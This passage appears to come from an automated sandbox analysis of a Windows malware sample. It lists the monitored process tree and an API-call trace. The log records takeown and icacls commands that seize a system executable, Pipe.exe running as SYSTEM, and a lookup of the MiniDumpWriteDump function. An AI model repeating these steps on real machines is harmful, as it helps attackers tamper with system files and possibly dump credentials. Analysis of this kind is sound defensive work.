"c:\\windows\\syswow64\\takeown.exe" page_root = "0x3f6e1000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6a8" cmd_line = "C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Pipe.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 41 os_tid = 0xa38 Process: id = "8" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x3e6e7000" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6a8" cmd_line = "C:\\Windows\\system32\\icacls.exe C:\\Windows\\system32\\Pipe.exe /reset" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 42 os_tid = 0x640 Process: id = "9" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 43 os_tid = 0x9fc Thread: id = 44 os_tid = 0x478 Thread: id = 45 os_tid = 0x99c Thread: id = 46 os_tid = 0x95c Thread: id = 47 os_tid = 0x580 Thread: id = 48 os_tid = 0x9c0 Thread: id = 49 os_tid = 0xbc Thread: id = 50 os_tid = 0xd0 Thread: id = 51 os_tid = 0x5c4 Thread: id = 52 os_tid = 0x18 Thread: id = 53 os_tid = 0x1c Thread: id = 54 os_tid = 0x50 Thread: id = 55 os_tid = 0x7c Thread: id = 56 os_tid = 0x60 Thread: id = 57 os_tid = 0xd4 Thread: id = 58 os_tid = 0x328 Thread: id = 59 os_tid = 0x340 Thread: id = 60 os_tid = 0xa0 Thread: id = 61 os_tid = 0x650 Thread: id = 62 os_tid = 0x468 Thread: id = 63 os_tid = 0x584 Thread: id = 64 os_tid = 0x0 Thread: id = 65 os_tid = 0x648 Thread: id = 66 os_tid = 0x54c Thread: id = 67 os_tid = 0x570 Thread: id = 68 os_tid = 0x20 Thread: id = 69 os_tid = 0x474 Thread: id = 70 os_tid = 0x7f8 Thread: id = 71 os_tid = 0xf8 Thread: id = 72 os_tid = 0x24 Thread: id = 73 os_tid = 0x6f8 Thread: id = 74 os_tid = 0x6e4 Thread: id = 75 os_tid = 0x6d4 Thread: id = 76 os_tid = 0x6c4 Thread: id = 77 os_tid = 0x6b4 Thread: id = 78 os_tid = 0x6ac Thread: id = 79 os_tid = 0x84 Thread: id = 80 os_tid = 0x650 Thread: id = 81 os_tid = 0x590 Thread: id = 82 os_tid = 0x94 Thread: id = 83 os_tid = 0x488 Thread: id = 84 os_tid = 0x470 Thread: id = 85 os_tid = 0x68 Thread: id = 86 os_tid = 0x138 Thread: id = 87 os_tid = 0x3d8 Thread: id = 88 os_tid = 0x9c Thread: id = 89 os_tid = 0x88 Thread: id = 90 os_tid = 0x8c Thread: id = 91 os_tid = 0x5c Thread: id = 92 os_tid = 0x78 Thread: id = 93 os_tid = 0x308 Thread: id = 94 os_tid = 0x28c Thread: id = 95 os_tid = 0x74 Thread: id = 96 os_tid = 0x98 Thread: id = 97 os_tid = 0x34 Thread: id = 98 os_tid = 0x100 Thread: id = 99 os_tid = 0x198 Thread: id = 100 os_tid = 0x80 Thread: id = 101 os_tid = 0x158 Thread: id = 102 os_tid = 0x154 Thread: id = 103 os_tid = 0x150 Thread: id = 104 os_tid = 0x120 Thread: id = 105 os_tid = 0x90 Thread: id = 106 os_tid = 0x4c Thread: id = 107 os_tid = 0x130 Thread: id = 108 os_tid = 0x128 Thread: id = 109 os_tid = 0x124 Thread: id = 110 os_tid = 0x11c Thread: id = 111 os_tid = 0x118 Thread: id = 112 os_tid = 0xc4 Thread: id = 113 os_tid = 0x44 Thread: id = 114 os_tid = 0x28 Thread: id = 115 os_tid = 0x40 Thread: id = 116 os_tid = 0x2c Thread: id = 117 os_tid = 0x48 Thread: id = 118 os_tid = 0x38 Thread: id = 119 os_tid = 0xb8 Thread: id = 120 os_tid = 0x3c Thread: id = 121 os_tid = 0xc0 Thread: id = 122 os_tid = 0xb0 Thread: id = 123 os_tid = 0x30 Thread: id = 124 os_tid = 0x8 Thread: id = 353 os_tid = 0xb14 Thread: id = 364 os_tid = 0x9dc Thread: id = 386 os_tid = 0x54 Process: id = "10" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1bb25000" os_pid = "0x1d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "2" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 125 os_tid = 0xb68 Thread: id = 126 os_tid = 0xb64 Thread: id = 127 os_tid = 0xb58 Thread: id = 128 os_tid = 0xb54 Thread: id = 129 os_tid = 0x4e8 Thread: id = 130 os_tid = 0x4dc Thread: id = 131 os_tid = 0x4d0 Thread: id = 132 os_tid = 0x378 Thread: id = 133 os_tid = 0x288 Thread: id = 134 os_tid = 0x24c Thread: id = 135 os_tid = 0x238 Thread: id = 136 os_tid = 0x234 Thread: id = 137 os_tid = 0x228 Thread: id = 138 os_tid = 0x224 Thread: id = 139 os_tid = 0x220 Thread: id = 140 os_tid = 0x21c Thread: id = 327 os_tid = 0x960 Thread: id = 338 os_tid = 0x8f0 Thread: id = 345 os_tid = 0x3a4 Thread: id = 428 os_tid = 0xa48 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xccc3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e7a" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 141 os_tid = 0xbd8 Thread: id = 142 os_tid = 0x708 Thread: id = 143 os_tid = 0x690 Thread: id = 144 os_tid = 0x2a0 Thread: id = 145 os_tid = 0x29c Thread: id = 146 os_tid = 0x284 Thread: id = 147 os_tid = 0x280 Thread: id = 148 os_tid = 0x27c Thread: id = 149 os_tid = 0x278 Thread: id = 150 os_tid = 0x274 Thread: id = 151 os_tid = 0x268 Thread: id = 152 os_tid = 0x260 Thread: id = 153 os_tid = 0x254 Thread: id = 376 os_tid = 0xe8 Thread: id = 404 os_tid = 0x8e0 Thread: id = 430 os_tid = 0xa70 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1a2ff000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b49c" [0xc000000f], "LOCAL" [0x7] Thread: id = 154 os_tid = 0x728 Thread: id = 155 os_tid = 0x3f8 Thread: id = 156 os_tid = 0x2c0 Thread: id = 157 os_tid = 0x2bc Thread: id = 158 os_tid = 0x2b8 Thread: id = 159 os_tid = 0x2b4 Thread: id = 160 os_tid = 0x2ac Thread: id = 161 os_tid = 0x2a4 Thread: id = 162 os_tid = 0x298 Thread: id = 431 os_tid = 0x9f0 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24f0e000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b7a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 163 os_tid = 0x240 Thread: id = 164 os_tid = 0xbf0 Thread: id = 165 os_tid = 0xa54 Thread: id = 166 os_tid = 0x600 Thread: id = 167 os_tid = 0x644 Thread: id = 168 os_tid = 0x5f8 Thread: id = 169 os_tid = 0x5f0 Thread: id = 170 os_tid = 0x5ec Thread: id = 171 os_tid = 0x5d0 Thread: id = 172 os_tid = 0x12c Thread: id = 173 os_tid = 0x170 Thread: id = 174 os_tid = 0x3c0 Thread: id = 175 os_tid = 0x3b8 Thread: id = 176 os_tid = 0x3a8 Thread: id = 177 os_tid = 0x2fc Thread: id = 178 os_tid = 0x2f8 Thread: id = 179 os_tid = 0x2e4 Thread: id = 180 os_tid = 0x2dc Thread: id = 181 os_tid = 0x2d4 Thread: id = 182 os_tid = 0x2cc Thread: id = 363 os_tid = 0x97c Thread: id = 380 os_tid = 0x4fc Thread: id = 387 os_tid = 0xac4 Thread: id = 427 os_tid = 0x620 Thread: id = 432 os_tid = 0xa10 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 183 os_tid = 0x330 Thread: id = 184 os_tid = 0x638 Thread: id = 185 os_tid = 0x554 Thread: id = 186 os_tid = 0x748 Thread: id = 187 os_tid = 0x72c Thread: id = 188 os_tid = 0x720 Thread: id = 189 os_tid = 0x668 Thread: id = 190 os_tid = 0x65c Thread: id = 191 os_tid = 0x144 Thread: id = 192 os_tid = 0x110 Thread: id = 193 os_tid = 0x3f0 Thread: id = 194 os_tid = 0x3ec Thread: id = 195 os_tid = 0x3e4 Thread: id = 196 os_tid = 0x3e0 Thread: id = 197 os_tid = 0x3d0 Thread: id = 198 os_tid = 0x3cc Thread: id = 199 os_tid = 0x398 Thread: id = 200 os_tid = 0x394 Thread: id = 201 os_tid = 0x384 Thread: id = 202 os_tid = 0x380 Thread: id = 203 os_tid = 0x368 Thread: id = 204 os_tid = 0x364 Thread: id = 205 os_tid = 0x350 Thread: id = 206 os_tid = 0x33c Thread: id = 391 os_tid = 0x748 Thread: id = 394 os_tid = 0x130 Thread: id = 433 os_tid = 0x6dc Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 207 os_tid = 0x93c Thread: id = 208 os_tid = 0x92c Thread: id = 209 os_tid = 0x8fc Thread: id = 210 os_tid = 0x8ec Thread: id = 211 os_tid = 0x8dc Thread: id = 212 os_tid = 0x8b8 Thread: id = 213 os_tid = 0x868 Thread: id = 214 os_tid = 0x320 Thread: id = 215 os_tid = 0x6cc Thread: id = 216 os_tid = 0x42c Thread: id = 217 os_tid = 0x1e4 Thread: id = 218 os_tid = 0x760 Thread: id = 219 os_tid = 0x75c Thread: id = 220 os_tid = 0x74c Thread: id = 221 os_tid = 0x710 Thread: id = 222 os_tid = 0x6d0 Thread: id = 223 os_tid = 0x6bc Thread: id = 224 os_tid = 0x6b8 Thread: id = 225 os_tid = 0x6b0 Thread: id = 226 os_tid = 0x69c Thread: id = 227 os_tid = 0x698 Thread: id = 228 os_tid = 0x684 Thread: id = 229 os_tid = 0x678 Thread: id = 230 os_tid = 0x4a8 Thread: id = 231 os_tid = 0x46c Thread: id = 232 os_tid = 0x44c Thread: id = 233 os_tid = 0x424 Thread: id = 234 os_tid = 0x420 Thread: id = 235 os_tid = 0x41c Thread: id = 236 os_tid = 0x404 Thread: id = 237 os_tid = 0x14c Thread: id = 238 os_tid = 0x158 Thread: id = 239 os_tid = 0x3fc Thread: id = 240 os_tid = 0x3f4 Thread: id = 241 os_tid = 0x3e8 Thread: id = 242 os_tid = 0x39c Thread: id = 243 os_tid = 0x390 Thread: id = 244 os_tid = 0x38c Thread: id = 245 os_tid = 0x388 Thread: id = 246 os_tid = 0x37c Thread: id = 247 os_tid = 0x374 Thread: id = 373 os_tid = 0xdc Thread: id = 374 os_tid = 0xe0 Thread: id = 375 os_tid = 0xe4 Thread: id = 409 os_tid = 0x4e0 Thread: id = 410 os_tid = 0xa90 Thread: id = 411 os_tid = 0x8f0 Thread: id = 421 os_tid = 0x910 Thread: id = 422 os_tid = 0x544 Thread: id = 423 os_tid = 0xb0c Thread: id = 424 os_tid = 0x248 Thread: id = 425 os_tid = 0xb08 Thread: id = 426 os_tid = 0x318 Thread: id = 429 os_tid = 0x618 Thread: id = 437 os_tid = 0xa18 Thread: id = 438 os_tid = 0xb30 Thread: id = 439 os_tid = 0xa08 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 248 os_tid = 0x4e4 Thread: id = 249 os_tid = 0x8d0 Thread: id = 250 os_tid = 0xa58 Thread: id = 251 os_tid = 0x548 Thread: id = 252 os_tid = 0x750 Thread: id = 253 os_tid = 0x6a0 Thread: id = 254 os_tid = 0x68c Thread: id = 255 os_tid = 0x680 Thread: id = 256 os_tid = 0x66c Thread: id = 257 os_tid = 0x614 Thread: id = 258 os_tid = 0x5fc Thread: id = 259 os_tid = 0x188 Thread: id = 260 os_tid = 0x140 Thread: id = 261 os_tid = 0x128 Thread: id = 262 os_tid = 0x2b0 Thread: id = 263 os_tid = 0x214 Thread: id = 264 os_tid = 0x130 Thread: id = 265 os_tid = 0x218 Thread: id = 266 os_tid = 0x1cc Thread: id = 435 os_tid = 0x734 Process: id = "17" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c150000" os_pid = "0x47c" os_integrity_level = "0x4000" os_privileges = "0x20a00080" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00010a1b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 267 os_tid = 0xa0c Thread: id = 268 os_tid = 0x4b8 Thread: id = 269 os_tid = 0x4b4 Thread: id = 270 os_tid = 0x498 Thread: id = 271 os_tid = 0x494 Thread: id = 272 os_tid = 0x480 Thread: id = 393 os_tid = 0x87c Thread: id = 395 os_tid = 0x5c4 Thread: id = 396 os_tid = 0x54c Thread: id = 397 os_tid = 0xa2c Thread: id = 398 os_tid = 0xa3c Thread: id = 399 os_tid = 0x308 Thread: id = 400 os_tid = 0x344 Thread: id = 401 os_tid = 0x89c Thread: id = 402 os_tid = 0x8c0 Thread: id = 403 os_tid = 0x8ac Thread: id = 405 os_tid = 0x88c Thread: id = 406 os_tid = 0x900 Thread: id = 407 os_tid = 0x704 Thread: id = 408 os_tid = 0x24c Thread: id = 436 os_tid = 0xb2c Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x35aa000" os_pid = "0x4bc" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001106d" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 273 os_tid = 0x414 Thread: id = 274 os_tid = 0x7d8 Thread: id = 275 os_tid = 0x744 Thread: id = 276 os_tid = 0x740 Thread: id = 277 os_tid = 0x73c Thread: id = 278 os_tid = 0x738 Thread: id = 279 os_tid = 0x6d8 Thread: id = 280 os_tid = 0x63c Thread: id = 281 os_tid = 0x62c Thread: id = 282 os_tid = 0x628 Thread: id = 283 os_tid = 0x624 Thread: id = 284 os_tid = 0x61c Thread: id = 285 os_tid = 0x610 Thread: id = 286 os_tid = 0x5e8 Thread: id = 287 os_tid = 0x5c8 Thread: id = 288 os_tid = 0x5c0 Thread: id = 289 os_tid = 0x5a0 Thread: id = 290 os_tid = 0x4f8 Thread: id = 291 os_tid = 0x4ec Thread: id = 292 os_tid = 0x4e0 Thread: id = 293 os_tid = 0x4d4 Thread: id = 294 os_tid = 0x4c4 Thread: id = 295 os_tid = 0x4c0 Process: id = "19" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xded000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 296 os_tid = 0x570 Thread: id = 297 os_tid = 0xad0 Thread: id = 298 os_tid = 0x7f0 Thread: id = 299 os_tid = 0x794 Thread: id = 300 os_tid = 0x784 Thread: id = 301 os_tid = 0x77c Thread: id = 302 os_tid = 0x778 Thread: id = 303 os_tid = 0x770 Thread: id = 304 os_tid = 0x4f4 Thread: id = 305 os_tid = 0x4d8 Thread: id = 306 os_tid = 0x4cc Thread: id = 349 os_tid = 0xb20 Thread: id = 372 os_tid = 0xd0 Process: id = "20" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x5f418000" os_pid = "0xbb0" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "taskhost.exe $(Arg0)" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT TASK\\Microsoft-Windows-SideShow-AutoWake" [0xe], "NT TASK\\Microsoft-Windows-SideShow-SystemDataProviders" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-UsbCeip" [0xe], "NT TASK\\Microsoft-Windows-Ras-MobilityManager" [0xe], "NT TASK\\Microsoft-Windows-PerfTrack-BackgroundConfigSurveyor" [0xe], "NT TASK\\Microsoft-Windows-RAC-RacTask" [0xe], "NT TASK\\Microsoft-Windows-Customer Experience Improvement Program-KernelCeipTask" [0xe], "NT AUTHORITY\\Logon Session 00000000:00052a4f" [0xc0000007], "LOCAL" [0x7] Thread: id = 307 os_tid = 0xb04 Thread: id = 308 os_tid = 0xbe8 Thread: id = 309 os_tid = 0xbe4 Thread: id = 310 os_tid = 0xbe0 Thread: id = 311 os_tid = 0xbdc Thread: id = 312 os_tid = 0xbd4 Thread: id = 313 os_tid = 0xbd0 Thread: id = 314 os_tid = 0xbc8 Thread: id = 315 os_tid = 0xbc0 Thread: id = 316 os_tid = 0xbbc Thread: id = 317 os_tid = 0xbb8 Thread: id = 318 os_tid = 0xbb4 Thread: id = 388 os_tid = 0xa38 Process: id = "21" image_name = "pipe.exe" filename = "c:\\windows\\syswow64\\pipe.exe" page_root = "0x3e834000" os_pid = "0x544" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\SysWOW64\\Pipe.exe -s" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 319 os_tid = 0x80c [0065.947] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0065.947] GetProcessHeap () returned 0x580000 [0065.947] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x466c) returned 0x594888 [0065.950] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xcb63aec0, dwHighDateTime=0x1d64ac6)) [0065.950] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0065.950] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=18660702291) returned 1 [0065.950] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90 [0065.950] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0065.950] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x208) returned 0x598f00 [0065.950] GetModuleFileNameW (in: hModule=0x1000000, lpFilename=0x598f00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\Pipe.exe" (normalized: "c:\\windows\\syswow64\\pipe.exe")) returned 0x1c [0065.951] StrRChrW (lpStart="C:\\Windows\\SysWOW64\\Pipe.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Pipe.exe" [0065.951] lstrlenW (lpString="Pipe.exe") returned 8 [0065.951] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x12) returned 0x599110 [0065.951] PathFindExtensionW (pszPath="Pipe.exe") returned=".exe" [0065.951] StrChrW (lpStart="Pipe", wMatch=0x3a) returned 0x0 [0065.951] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0065.954] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0065.954] lstrlenW (lpString="Pipe") returned 4 [0065.954] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0065.954] RtlAllocateHeap (HeapHandle=0x580000, 